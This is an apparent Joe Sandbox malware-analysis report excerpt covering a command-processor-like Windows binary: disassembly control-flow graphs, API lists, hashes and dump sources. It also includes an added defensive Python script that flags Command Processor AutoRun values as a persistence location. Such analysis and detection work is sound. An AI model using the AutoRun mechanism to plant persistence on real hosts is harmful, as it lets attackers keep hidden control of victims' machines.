_get_osfhandle GetFileType 22575->22725 22577 7ff6e942af98 2 API calls 22576->22577 22577->22583 22578->22575 22579->22580 22585 7ff6e94309f4 2 API calls 22579->22585 22582 7ff6e942af98 2 API calls 22580->22582 22584 7ff6e942b038 _dup2 22581->22584 22586 
7ff6e943c24b 22582->22586 22583->22554 22583->22555 22588 7ff6e943c1b7 22584->22588 22589 7ff6e943c084 22585->22589 22590 7ff6e944f1d8 166 API calls 22586->22590 22596 7ff6e942af98 2 API calls 22587->22596 22591 7ff6e943c207 22588->22591 22592 7ff6e943c1be 22588->22592 22593 7ff6e942b900 166 API calls 22589->22593 22590->22583 22595 7ff6e942d208 _close 22591->22595 22597 7ff6e942d208 _close 22592->22597 22594 7ff6e943c08c 22593->22594 22598 7ff6e943c094 wcsrchr 22594->22598 22611 7ff6e943c0ad 22594->22611 22595->22587 22599 7ff6e943c211 22596->22599 22597->22600 22598->22611 22601 7ff6e94333f0 _vsnwprintf 22599->22601 22600->22571 22602 7ff6e943c22c 22601->22602 22603 7ff6e9423278 166 API calls 22602->22603 22603->22583 22604 7ff6e943c106 22605 7ff6e942ff70 2 API calls 22604->22605 22607 7ff6e943c13b 22605->22607 22606 7ff6e943c0e0 _wcsnicmp 22606->22611 22607->22580 22608 7ff6e943c146 SearchPathW 22607->22608 22608->22580 22609 7ff6e943c188 22608->22609 22610 7ff6e94326e0 19 API calls 22609->22610 22610->22581 22611->22604 22611->22606 22613 7ff6e9427279 22612->22613 22615 7ff6e9427211 _setjmp 22612->22615 22613->22463 22615->22613 22616 7ff6e9427265 22615->22616 22726 7ff6e94272b0 22616->22726 22619 7ff6e942cb63 22618->22619 22620 7ff6e942cd90 166 API calls 22619->22620 22621 7ff6e942cb99 22620->22621 22621->22492 22621->22513 22623 7ff6e942cad9 22622->22623 22624 7ff6e942cb05 22622->22624 22623->22624 22625 7ff6e942cd90 166 API calls 22623->22625 22634 7ff6e9434224 InitializeProcThreadAttributeList 22624->22634 22626 7ff6e943c722 22625->22626 22626->22624 22627 7ff6e943c72e GetConsoleTitleW 22626->22627 22627->22624 22628 7ff6e943c74a 22627->22628 22629 7ff6e942b6b0 170 API calls 22628->22629 22633 7ff6e943c778 22629->22633 22630 7ff6e943c7ec 22631 7ff6e942ff70 2 API calls 22630->22631 22631->22624 22632 7ff6e943c7dd SetConsoleTitleW 22632->22630 22633->22630 22633->22632 22635 7ff6e94342ab UpdateProcThreadAttribute 22634->22635 22636 7ff6e943ecd4 GetLastError 
22634->22636 22637 7ff6e94342eb memset memset GetStartupInfoW 22635->22637 22638 7ff6e943ecf0 GetLastError 22635->22638 22639 7ff6e943ecee 22636->22639 22641 7ff6e9433a90 170 API calls 22637->22641 22707 7ff6e9449eec 22638->22707 22643 7ff6e94343a8 22641->22643 22644 7ff6e942b900 166 API calls 22643->22644 22645 7ff6e94343bb 22644->22645 22646 7ff6e9434638 _local_unwind 22645->22646 22647 7ff6e94343cc 22645->22647 22646->22647 22648 7ff6e94343de wcsrchr 22647->22648 22649 7ff6e9434415 22647->22649 22648->22649 22650 7ff6e94343f7 lstrcmpW 22648->22650 22694 7ff6e9435a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22649->22694 22650->22649 22652 7ff6e9434668 22650->22652 22695 7ff6e9449044 22652->22695 22653 7ff6e943441a 22655 7ff6e943442a CreateProcessW 22653->22655 22657 7ff6e9434596 CreateProcessAsUserW 22653->22657 22656 7ff6e943448b 22655->22656 22658 7ff6e9434495 CloseHandle 22656->22658 22659 7ff6e9434672 GetLastError 22656->22659 22657->22656 22660 7ff6e943498c 8 API calls 22658->22660 22664 7ff6e943468d 22659->22664 22661 7ff6e94344c5 22660->22661 22662 7ff6e94344cd 22661->22662 22661->22664 22663 7ff6e94347a3 22662->22663 22681 7ff6e944a250 33 API calls 22662->22681 22685 7ff6e94344f8 22662->22685 22663->22507 22664->22662 22665 7ff6e942cd90 166 API calls 22664->22665 22666 7ff6e9434724 22665->22666 22669 7ff6e943472c _local_unwind 22666->22669 22674 7ff6e943473d 22666->22674 22667 7ff6e9435cb4 7 API calls 22671 7ff6e9434517 22667->22671 22668 7ff6e943461c 22672 7ff6e942ff70 GetProcessHeap RtlFreeHeap 22668->22672 22669->22674 22670 7ff6e94347e1 CloseHandle 22670->22668 22673 7ff6e94333f0 _vsnwprintf 22671->22673 22675 7ff6e94347fa DeleteProcThreadAttributeList 22672->22675 22676 7ff6e9434544 22673->22676 22682 7ff6e942ff70 GetProcessHeap RtlFreeHeap 22674->22682 22677 7ff6e9438f80 7 API calls 22675->22677 22678 7ff6e943498c 8 API calls 22676->22678 22679 7ff6e9434820 22677->22679 22680 7ff6e9434558 22678->22680 22679->22507 22683 
7ff6e94347ae 22680->22683 22684 7ff6e9434564 22680->22684 22681->22685 22687 7ff6e943475b _local_unwind 22682->22687 22686 7ff6e94333f0 _vsnwprintf 22683->22686 22688 7ff6e943498c 8 API calls 22684->22688 22685->22663 22685->22667 22690 7ff6e9434612 22685->22690 22686->22690 22687->22662 22689 7ff6e9434577 22688->22689 22689->22668 22691 7ff6e943457f 22689->22691 22690->22668 22690->22670 22692 7ff6e944a920 210 API calls 22691->22692 22693 7ff6e9434584 22692->22693 22693->22668 22696 7ff6e9433a90 170 API calls 22695->22696 22697 7ff6e9449064 22696->22697 22698 7ff6e944906e 22697->22698 22700 7ff6e9449083 22697->22700 22699 7ff6e943498c 8 API calls 22698->22699 22701 7ff6e9449081 22699->22701 22702 7ff6e942cd90 166 API calls 22700->22702 22701->22649 22703 7ff6e944909b 22702->22703 22703->22701 22704 7ff6e943498c 8 API calls 22703->22704 22705 7ff6e94490ec 22704->22705 22706 7ff6e942ff70 2 API calls 22705->22706 22706->22701 22708 7ff6e943ed0a DeleteProcThreadAttributeList 22707->22708 22708->22639 22710 7ff6e942c4c9 22709->22710 22711 7ff6e942c486 22709->22711 22715 7ff6e942ff70 2 API calls 22710->22715 22716 7ff6e942c161 22710->22716 22712 7ff6e942c48e wcschr 22711->22712 22711->22716 22713 7ff6e942c4ef 22712->22713 22712->22716 22714 7ff6e942cd90 166 API calls 22713->22714 22722 7ff6e942c4f9 22714->22722 22715->22716 22716->22516 22716->22538 22717 7ff6e942c5bd 22718 7ff6e942c541 22717->22718 22720 7ff6e942b6b0 170 API calls 22717->22720 22718->22716 22719 7ff6e942ff70 2 API calls 22718->22719 22719->22716 22720->22718 22721 7ff6e942d840 178 API calls 22721->22722 22722->22716 22722->22717 22722->22718 22722->22721 22722->22722 22724 7ff6e942b018 22723->22724 22724->22575 22725->22575 22727 7ff6e9444621 22726->22727 22728 7ff6e94272de 22726->22728 22732 7ff6e944447b longjmp 22727->22732 22733 7ff6e9444639 22727->22733 22750 7ff6e94447e0 22727->22750 22753 7ff6e944475e 22727->22753 22729 7ff6e94272eb 22728->22729 22737 7ff6e9444467 22728->22737 22738 7ff6e9444530 
22728->22738 22787 7ff6e9427348 22729->22787 22731 7ff6e9427348 168 API calls 22736 7ff6e9444524 22731->22736 22734 7ff6e9444492 22732->22734 22739 7ff6e944463e 22733->22739 22740 7ff6e9444695 22733->22740 22741 7ff6e9427348 168 API calls 22734->22741 22746 7ff6e94272b0 168 API calls 22736->22746 22755 7ff6e9427323 22736->22755 22737->22729 22737->22734 22749 7ff6e9444475 22737->22749 22742 7ff6e9427348 168 API calls 22738->22742 22739->22732 22751 7ff6e9444654 22739->22751 22748 7ff6e94273d4 168 API calls 22740->22748 22761 7ff6e94444a8 22741->22761 22762 7ff6e9444549 22742->22762 22743 7ff6e9427315 22802 7ff6e94273d4 22743->22802 22744 7ff6e9427348 168 API calls 22744->22750 22745 7ff6e9427348 168 API calls 22745->22743 22754 7ff6e944480e 22746->22754 22765 7ff6e944469a 22748->22765 22749->22732 22749->22740 22750->22731 22763 7ff6e9427348 168 API calls 22751->22763 22752 7ff6e94445b2 22756 7ff6e9427348 168 API calls 22752->22756 22753->22744 22754->22613 22755->22613 22759 7ff6e94445c7 22756->22759 22757 7ff6e944455e 22757->22752 22766 7ff6e9427348 168 API calls 22757->22766 22758 7ff6e94446e1 22764 7ff6e94272b0 168 API calls 22758->22764 22767 7ff6e9427348 168 API calls 22759->22767 22760 7ff6e94444e2 22769 7ff6e94272b0 168 API calls 22760->22769 22761->22760 22768 7ff6e9427348 168 API calls 22761->22768 22762->22752 22762->22757 22776 7ff6e9427348 168 API calls 22762->22776 22763->22755 22770 7ff6e9444738 22764->22770 22765->22758 22777 7ff6e94446c7 22765->22777 22778 7ff6e94446ea 22765->22778 22766->22752 22772 7ff6e94445db 22767->22772 22768->22760 22773 7ff6e94444f1 22769->22773 22771 7ff6e9427348 168 API calls 22770->22771 22771->22736 22774 7ff6e9427348 168 API calls 22772->22774 22775 7ff6e94272b0 168 API calls 22773->22775 22779 7ff6e94445ec 22774->22779 22780 7ff6e9444503 22775->22780 22776->22757 22777->22758 22784 7ff6e9427348 168 API calls 22777->22784 22781 7ff6e9427348 168 API calls 22778->22781 22782 7ff6e9427348 168 API calls 22779->22782 
22780->22755 22783 7ff6e9427348 168 API calls 22780->22783 22781->22758 22785 7ff6e9444600 22782->22785 22783->22736 22784->22758 22786 7ff6e9427348 168 API calls 22785->22786 22786->22736 22790 7ff6e942735d 22787->22790 22788 7ff6e9423278 166 API calls 22789 7ff6e9444820 longjmp 22788->22789 22791 7ff6e9444838 22789->22791 22790->22788 22790->22790 22790->22791 22801 7ff6e94273ab 22790->22801 22792 7ff6e9423278 166 API calls 22791->22792 22793 7ff6e9444844 longjmp 22792->22793 22794 7ff6e944485a 22793->22794 22795 7ff6e9427348 166 API calls 22794->22795 22796 7ff6e944487b 22795->22796 22797 7ff6e9427348 166 API calls 22796->22797 22798 7ff6e94448ad 22797->22798 22799 7ff6e9427348 166 API calls 22798->22799 22800 7ff6e94272ff 22799->22800 22800->22743 22800->22745 22803 7ff6e9427401 22802->22803 22803->22755 22804 7ff6e9427348 168 API calls 22803->22804 22805 7ff6e944487b 22804->22805 22806 7ff6e9427348 168 API calls 22805->22806 22807 7ff6e94448ad 22806->22807 22808 7ff6e9427348 168 API calls 22807->22808 22809 7ff6e94448be 22808->22809 22809->22755
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
• String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
• API String ID: 3305344409-4288247545
• Opcode ID: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
• Instruction ID: d8c265ddad6b4c801b0f1a3f7ced96ce76b96d14dc3697a63a894a568eea3a58
• Opcode Fuzzy Hash: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
• Instruction Fuzzy Hash: 174290A3A08682C5EB65DF3198183B967A0AF89B94F444234D91EC77D5DF3EE54CC30A

Control-flow Graph

• Executed
• Not Executed
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
• String ID: :$:$:$:ON$OFF
• API String ID: 972821348-467788257
• Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
• Instruction ID: 9c40596f1326973e12df33aee824721af9d8f43258b3750f73bc2f4b8dc03744
• Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
• Instruction Fuzzy Hash: 95229E63A18642D6FB64DF7598183B86691FF49B80F488035CA0EC77D5DE3EA44CC35A

Control-flow Graph
Function at 7ff6e94351ec (image base 7ff6e9420000). The rendered graph, with its executed/not-executed colouring, is not reproduced; its basic blocks call GetLocaleInfoW (repeatedly), setlocale, and the internal subroutines at 7ff6e9435508 and 7ff6e9438f80.
APIs and Strings: see the API ID and String ID fields under Similarity.
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: InfoLocale$DefaultUsersetlocale
• String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
• API String ID: 1351325837-2236139042
• Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
• Instruction ID: 2ca22a8d62fbf2c1e0eea160f63df73518fe4804e380967333710ee0b07453a0
• Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
• Instruction Fuzzy Hash: 46F15A63B18742D5EF218F35E9143B966A4BF04B84F948135CA0D877A4EF3EE949C30A

Control-flow Graph
Function at 7ff6e9434224 (image base 7ff6e9420000). The rendered graph, with its executed/not-executed colouring, is not reproduced; its basic blocks call InitializeProcThreadAttributeList, UpdateProcThreadAttribute, GetLastError, DeleteProcThreadAttributeList, memset, GetStartupInfoW, _local_unwind, wcsrchr, lstrcmpW, CloseHandle, and either CreateProcessW or CreateProcessAsUserW, plus the internal subroutines at 7ff6e9449eec, 7ff6e9433a90, 7ff6e942b900, 7ff6e9435a68, 7ff6e9449044, 7ff6e943498c, 7ff6e94397bc, 7ff6e947c038, 7ff6e942cd90, 7ff6e9435cb4, 7ff6e94313e0, 7ff6e942ff70, 7ff6e94333f0, 7ff6e944a250, 7ff6e944a920 and 7ff6e9438f80.
APIs and Strings: see the API ID and String ID fields under Similarity.
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
• String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
• API String ID: 388421343-2905461000
• Opcode ID: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
• Instruction ID: c024f5d33f1caef2cb71c9703c64383980c643c3d7048c96cf4362f78e1b4b1c
• Opcode Fuzzy Hash: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
• Instruction Fuzzy Hash: A6F12B73A19A86D6EB60DF21E4443BA77A4FF85B80F404135DA4D82795DF3EE448CB0A

Control-flow Graph
Function at 7ff6e9435554 (image base 7ff6e9420000). The rendered graph, with its executed/not-executed colouring, is not reproduced; its basic blocks call RegOpenKeyExW, RegQueryValueExW (seven times, one per value name in the String ID list), _wtol, wcstol, RegCloseKey, ExpandEnvironmentStringsW, time and srand, plus the internal subroutines at 7ff6e943a640, 7ff6e9438f80, 7ff6e94313e0 and 7ff6e942b900.
APIs and Strings: see the API ID and String ID fields under Similarity.
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: QueryValue$CloseOpensrandtime
• String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
• API String ID: 145004033-3846321370
• Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
• Instruction ID: fd95c9b61ba7746aaef4a795ddadbf7c456097f6dbde7ea9bbbc61292e6250bb
• Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
• Instruction Fuzzy Hash: 83E1503352DA82C6E750DF60E45467EB7A0FF89740F405135EA8E82A58DF7ED548CB0A
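The function listed above (entry 7ff6e9435554) opens Software\Microsoft\Command Processor and queries AutoRun, CompletionChar, DefaultColor, DelayedExpansion, DisableUNCCheck, EnableExtensions and PathCompletionChar, which is the Windows command processor reading its start-up configuration. AutoRun is run by every cmd.exe instance that is not started with /d, so on a host where this sample executed it is a persistence location worth checking. The triage script below is an added example, not Joe Sandbox code and not part of the sample: it parses a `reg export` of those keys in the REGEDIT 5.00 text format and flags any non-empty AutoRun. The embedded export text and the `example.cmd` path in it are constructed for the example.

```python
r"""Triage check for Command Processor AutoRun persistence.

Added example for this report; not Joe Sandbox code and not part of the sample.
On a live host the input would come from
    reg export "HKCU\Software\Microsoft\Command Processor" cp_hkcu.reg
(and the same for HKLM); here a constructed export is embedded instead.
"""
import re

# Value names taken from the report's String ID list for the function at 7ff6e9435554.
COMMAND_PROCESSOR_VALUES = (
    "AutoRun", "CompletionChar", "DefaultColor", "DelayedExpansion",
    "DisableUNCCheck", "EnableExtensions", "PathCompletionChar",
)

# Constructed sample export: a stock HKLM key plus an HKCU key that sets AutoRun.
# The script path is invented for the example.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
"CompletionChar"=dword:00000040
"DefaultColor"=dword:00000000
"EnableExtensions"=dword:00000001
"PathCompletionChar"=dword:00000040

[HKEY_CURRENT_USER\Software\Microsoft\Command Processor]
"AutoRun"="\"C:\\Users\\Public\\example.cmd\""
"DelayedExpansion"=dword:00000000
'''

_KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
_VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.+)$')
_CP_SUFFIX = r"\software\microsoft\command processor"


def _decode_reg_string(quoted: str) -> str:
    """Strip the surrounding quotes and resolve the backslash escapes of a .reg REG_SZ value."""
    return re.sub(r"\\(.)", r"\1", quoted[1:-1])


def parse_reg_export(text: str) -> dict:
    """Return {key_path: {value_name: value}} for a .reg export.

    dword values become ints and REG_SZ values become str; other encodings
    (hex:, hex(2): ...) are kept as their raw text.
    """
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        key_match = _KEY_RE.match(line)
        if key_match:
            current = key_match.group("key")
            keys.setdefault(current, {})
            continue
        value_match = _VALUE_RE.match(line)
        if value_match is None or current is None:
            continue
        name, data = value_match.group("name"), value_match.group("data")
        if data.startswith("dword:"):
            keys[current][name] = int(data[len("dword:"):], 16)
        elif len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            keys[current][name] = _decode_reg_string(data)
        else:
            keys[current][name] = data
    return keys


def command_processor_keys(keys: dict) -> dict:
    """Select every Command Processor key and keep only the values the analysed function queries."""
    return {
        key: {name: values[name] for name in COMMAND_PROCESSOR_VALUES if name in values}
        for key, values in keys.items()
        if key.lower().endswith(_CP_SUFFIX)
    }


def find_autorun(keys: dict) -> list:
    """Return (key, command) for each Command Processor key whose AutoRun is non-empty.

    An empty or absent AutoRun runs nothing; anything else is executed by every
    cmd.exe start that does not use /d, so it is reported for examination.
    """
    return [
        (key, values["AutoRun"])
        for key, values in command_processor_keys(keys).items()
        if values.get("AutoRun")
    ]


if __name__ == "__main__":
    parsed = parse_reg_export(SAMPLE_REG_EXPORT)
    for key, values in command_processor_keys(parsed).items():
        print(key)
        for name, value in values.items():
            print(f"  {name} = {value!r}")
    for key, command in find_autorun(parsed):
        print(f"AUTORUN SET under {key}: {command}")
```

Run it against real exports of both the HKCU and HKLM keys, since cmd.exe consults both; a non-empty AutoRun is not proof of compromise on its own, but the command it names should be identified before the host is cleared.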

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 821 7ff6e94337d8-7ff6e9433887 GetCurrentThreadId OpenThread call 7ff6e94304f4 HeapSetInformation RegOpenKeyExW 824 7ff6e943e9f8-7ff6e943ea3b RegQueryValueExW RegCloseKey 821->824 825 7ff6e943388d-7ff6e94338eb call 7ff6e9435920 GetConsoleOutputCP GetCPInfo 821->825 827 7ff6e943ea41-7ff6e943ea59 GetThreadLocale 824->827 825->827 831 7ff6e94338f1-7ff6e9433913 memset 825->831 829 7ff6e943ea5b-7ff6e943ea67 827->829 830 7ff6e943ea74-7ff6e943ea77 827->830 829->830 834 7ff6e943ea79-7ff6e943ea7d 830->834 835 7ff6e943ea94-7ff6e943ea96 830->835 832 7ff6e9433919-7ff6e9433935 call 7ff6e9434d5c 831->832 833 7ff6e943eaa5 831->833 842 7ff6e943393b-7ff6e9433942 832->842 843 7ff6e943eae2-7ff6e943eaff call 7ff6e9423240 call 7ff6e9448530 call 7ff6e9434c1c 832->843 836 7ff6e943eaa8-7ff6e943eab4 833->836 834->835 838 7ff6e943ea7f-7ff6e943ea89 834->838 835->833 836->832 839 7ff6e943eaba-7ff6e943eac3 836->839 838->835 841 7ff6e943eacb-7ff6e943eace 839->841 844 7ff6e943ead0-7ff6e943eadb 841->844 845 7ff6e943eac5-7ff6e943eac9 841->845 847 7ff6e9433948-7ff6e9433962 _setjmp 842->847 848 7ff6e943eb27-7ff6e943eb40 _setjmp 842->848 854 7ff6e943eb00-7ff6e943eb0d 843->854 844->836 851 7ff6e943eadd 844->851 845->841 853 7ff6e9433968-7ff6e943396d 847->853 847->854 849 7ff6e943eb46-7ff6e943eb49 848->849 850 7ff6e94339fe-7ff6e9433a05 call 7ff6e9434c1c 848->850 856 7ff6e943eb66-7ff6e943eb6f call 7ff6e94301b8 849->856 857 7ff6e943eb4b-7ff6e943eb65 call 7ff6e9423240 call 7ff6e9448530 call 7ff6e9434c1c 849->857 850->824 851->832 859 7ff6e94339b9-7ff6e94339bb 853->859 860 7ff6e943396f 853->860 868 7ff6e943eb15-7ff6e943eb1f call 7ff6e9434c1c 854->868 882 7ff6e943eb87-7ff6e943eb89 call 7ff6e94386f0 856->882 883 7ff6e943eb71-7ff6e943eb82 _setmode 856->883 857->856 863 7ff6e943eb20 859->863 864 7ff6e94339c1-7ff6e94339c3 call 
7ff6e9434c1c 859->864 867 7ff6e9433972-7ff6e943397d 860->867 863->848 879 7ff6e94339c8 864->879 869 7ff6e94339c9-7ff6e94339de call 7ff6e942df60 867->869 870 7ff6e943397f-7ff6e9433984 867->870 868->863 869->868 891 7ff6e94339e4-7ff6e94339e8 869->891 870->867 876 7ff6e9433986-7ff6e94339ae call 7ff6e9430580 GetConsoleOutputCP GetCPInfo call 7ff6e94304f4 870->876 897 7ff6e94339b3 876->897 879->869 888 7ff6e943eb8e-7ff6e943ebad call 7ff6e94358e4 call 7ff6e942df60 882->888 883->882 902 7ff6e943ebaf-7ff6e943ebb3 888->902 891->850 895 7ff6e94339ea-7ff6e94339ef call 7ff6e942be00 891->895 899 7ff6e94339f4-7ff6e94339fc 895->899 897->859 899->870 902->850 903 7ff6e943ebb9-7ff6e943ec24 call 7ff6e94358e4 GetConsoleOutputCP GetCPInfo call 7ff6e94304f4 call 7ff6e942be00 call 7ff6e9430580 GetConsoleOutputCP GetCPInfo call 7ff6e94304f4 902->903 903->888
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
• String ID: DisableCMD$Software\Policies\Microsoft\Windows\System

Control-flow Graph

Similarity
• API ID: ErrorFileFindFirstLast

Control-flow Graph


Control-flow Graph

APIs
• InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434D9A
  • Part of subcall function 00007FF6E94358E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF6E944C6DB), ref: 00007FF6E94358EF
• SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434DBB
• _get_osfhandle.MSVCRT ref: 00007FF6E9434DCA
• GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434DE0
• _get_osfhandle.MSVCRT ref: 00007FF6E9434DEE
• GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434E04
  • Part of subcall function 00007FF6E9430580: _get_osfhandle.MSVCRT ref: 00007FF6E9430589
  • Part of subcall function 00007FF6E9430580: SetConsoleMode.KERNELBASE ref: 00007FF6E943059E
  • Part of subcall function 00007FF6E9430580: _get_osfhandle.MSVCRT ref: 00007FF6E94305AF
  • Part of subcall function 00007FF6E9430580: GetConsoleMode.KERNELBASE ref: 00007FF6E94305C5
  • Part of subcall function 00007FF6E9430580: _get_osfhandle.MSVCRT ref: 00007FF6E94305EF
  • Part of subcall function 00007FF6E9430580: GetConsoleMode.KERNELBASE ref: 00007FF6E9430605
  • Part of subcall function 00007FF6E9430580: _get_osfhandle.MSVCRT ref: 00007FF6E9430632
  • Part of subcall function 00007FF6E9430580: SetConsoleMode.KERNELBASE ref: 00007FF6E9430647
  • Part of subcall function 00007FF6E9434A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A28
